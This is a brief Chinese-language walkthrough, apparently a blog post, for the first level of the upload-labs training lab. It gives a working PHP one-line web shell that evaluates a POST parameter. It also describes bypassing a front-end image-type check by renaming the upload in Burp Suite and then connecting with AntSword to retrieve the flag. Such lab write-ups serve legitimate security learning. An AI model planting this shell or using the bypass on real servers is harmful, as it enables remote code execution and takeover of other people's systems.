Pass-01
准备好的一句话木马<?Php @eval($_POST['attack']);?>
1.查看源代码
代码意思就是上传的文件必须是jpg或者png或者gif类型
然后我们把一句话木马写入保存成jpg文件即可
上传用bp抓包,将.jpg改成php,然后Forward即可,点取消拦截,当用菜刀或者蚁剑连接时,右键这个上传的图片,复制图片地址即可,(我用的是蚁剑)
上面的url地址就是图片地址,
连接密码就是一句话木马里面的attack(我这里上传的是attack,自己可以改)当右下角显示连接成功即可,进去目录找到flag即可
upload-labs--pass-01
最新推荐文章于 2022-09-26 15:20:09 发布